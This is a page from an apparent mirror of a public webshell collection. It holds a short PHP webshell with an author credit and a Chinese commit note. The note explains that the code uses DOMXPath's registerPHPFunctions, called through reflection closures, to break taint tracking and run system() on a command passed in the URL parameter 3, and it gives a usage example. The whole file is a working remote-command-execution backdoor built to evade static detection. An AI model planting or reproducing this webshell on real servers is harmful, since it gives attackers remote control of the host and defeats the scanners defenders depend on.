mirror of
https://github.com/tennc/webshell
synced 2024-09-20 05:41:58 +00:00
c9540e5a85
from : https://zhuanlan.zhihu.com/p/550150061 该样本需要一些条件,前提是开启了php-xml拓展才可以,其原理就是用XML去注册一个registerPHPFunctions,也就是我们想要执行的system再利用getClosure去触发该方法而构成的webshell,其中即利用到了PHP的特性,利用registerNamespace和registerPHPFunctions来中断污点追踪,从而RCE usage: xxx.php?3=whoami
24 lines
807 B
PHP
24 lines
807 B
PHP
<?php
|
||
// dom and xml needed, install php-xml and leave php.ini as default.
|
||
// Author:LemonPrefect
|
||
$cmd = $_GET[3];
|
||
$_REQUEST[1] = "//book[php:functionString('system', '$cmd') = 'PHP']";
|
||
$_REQUEST[2] = ["php", "http://php.net/xpath"];
|
||
$xml = <<< XML
|
||
<?xml version="1.0" encoding="UTF-8"?>
|
||
<books>
|
||
<book>
|
||
<title>We are the champions</title>
|
||
<author>LemonPrefect</author>
|
||
<author>H3h3QAQ</author>
|
||
</book>
|
||
</books>
|
||
XML;
|
||
|
||
$doc = new DOMDocument;
|
||
$doc->loadXML($xml);
|
||
$clazz = (new ReflectionClass("DOMXPath"));
|
||
$instance = $clazz->newInstance($doc);
|
||
$clazz->getMethod("registerNamespace")->getClosure($instance)->__invoke(...$_REQUEST[2]);
|
||
$clazz->getMethod("registerPHPFunctions")->invoke($instance);
|
||
$clazz->getMethod("query")->getClosure($instance)->__invoke($_REQUEST[1]);
|